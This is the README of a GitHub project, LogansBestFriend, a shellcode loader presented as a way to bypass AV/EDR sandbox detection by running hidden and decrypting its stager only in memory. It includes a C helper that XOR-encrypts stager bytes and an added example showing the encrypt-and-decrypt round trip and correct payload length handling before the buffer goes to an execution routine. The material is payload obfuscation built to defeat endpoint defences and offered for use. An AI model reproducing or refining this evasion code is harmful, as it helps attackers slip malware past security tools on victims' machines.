Customized Shellcode loader which bypasses AV/EDR sandbox detections and decrypts shellcode in memory.

logangoins/LogansBestFriend

LogansBestFriend

LogansBestFriend is a practical modification of the simple shellcode loader "GregsBestFriend" from WhiteKnightLabs, which uses regex to bypass sandbox detections.

LogansBestFriend is configured so that it does not pop a debug CMD window, runs as a background process, and decrypts the stager shellcode in memory rather than storing it in the clear.

Stager shellcode in C format (a `\x..` byte string) can be XOR-encrypted with a repeating key using the helper below; the loader must be built with the same key so it can reverse the operation in memory:

#include <stdio.h>
#include <string.h>   /* strlen */

unsigned char code[] = "\x90\x90\x90"; /* paste the stager's C-format bytes here */

int main(void)
{
    char key[] = "key"; /* Enter key here; the loader must use the same key */
    size_t keylen = strlen(key);
    size_t i;
    /* sizeof(code) counts the NUL that the string literal appends, so one extra
     * byte is emitted; keep the loader's length convention consistent with this. */
    for (i = 0; i < sizeof(code); i++) {
        printf("\\x%02x", code[i] ^ key[i % keylen]);
    }
    printf("\n");
    return 0;
}
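The encrypt-then-decrypt round trip that the loader depends on, as an added example that is not the project's own code. It uses a constructed byte string as a stand-in for a stager (not real shellcode) and the hypothetical key "key"; `xor_crypt`, `emit_encrypted`, `roundtrip_ok` and `strlen_truncated_length` are names chosen for this example. It also shows why the length must come from `sizeof`, never `strlen`: real stagers contain 0x00 bytes.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* In-place repeating-key XOR. XOR is its own inverse, so the same call
 * encrypts the stager offline and decrypts it again inside the loader. */
static void xor_crypt(unsigned char *buf, size_t len,
                      const unsigned char *key, size_t keylen)
{
    for (size_t i = 0; i < len; i++)
        buf[i] ^= key[i % keylen];
}

/* Constructed stand-in for a stager: NOT real shellcode, just bytes, chosen to
 * include embedded 0x00 so the strlen() pitfall is visible. */
static const unsigned char plain_stager[] =
    "\xfc\x48\x83\xe4\xf0\xe8\x00\x00\x00\x00";

/* Exclude the NUL terminator the string literal appends. */
#define STAGER_LEN (sizeof(plain_stager) - 1)

/* Offline side: encrypt a copy of the stager into out. Returns bytes written,
 * or 0 if the output buffer is too small. */
size_t emit_encrypted(const unsigned char *key, size_t keylen,
                      unsigned char *out, size_t outcap)
{
    if (keylen == 0 || outcap < STAGER_LEN)
        return 0;
    memcpy(out, plain_stager, STAGER_LEN);
    xor_crypt(out, STAGER_LEN, key, keylen);
    return STAGER_LEN;
}

/* Loader side: decrypt in place with the same key and confirm the original
 * bytes come back. Returns 1 on success, 0 on failure. */
int roundtrip_ok(const unsigned char *key, size_t keylen)
{
    unsigned char buf[sizeof(plain_stager)];
    size_t n = emit_encrypted(key, keylen, buf, sizeof buf);
    if (n != STAGER_LEN)
        return 0;
    xor_crypt(buf, n, key, keylen);          /* decrypt in memory */
    return memcmp(buf, plain_stager, n) == 0;
}

/* Shows the truncation: strlen() stops at the first 0x00 inside the stager,
 * so sizing the buffer with it would silently drop the tail of the payload. */
size_t strlen_truncated_length(void)
{
    return strlen((const char *)plain_stager);
}

int main(void)
{
    const unsigned char key[] = "key";   /* hypothetical key, matches the helper above */
    size_t keylen = sizeof key - 1;
    unsigned char enc[sizeof plain_stager];
    size_t n = emit_encrypted(key, keylen, enc, sizeof enc);

    /* Print in the same C-array form the encryption helper produces. */
    printf("unsigned char code[] = \"");
    for (size_t i = 0; i < n; i++)
        printf("\\x%02x", enc[i]);
    printf("\";\n");

    printf("strlen() would see %zu of %zu bytes\n",
           strlen_truncated_length(), (size_t)STAGER_LEN);
    printf("round trip %s\n", roundtrip_ok(key, keylen) ? "ok" : "FAILED");
    return 0;
}
```

Because XOR is symmetric, the loader needs no separate decrypt routine: it calls the same function over the embedded array once, then hands the buffer to whatever execution primitive it uses. Whichever convention is chosen for the trailing NUL (kept, as in the helper above, or dropped, as here), encryptor and loader must agree on the length or the last byte of the stager is corrupted.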
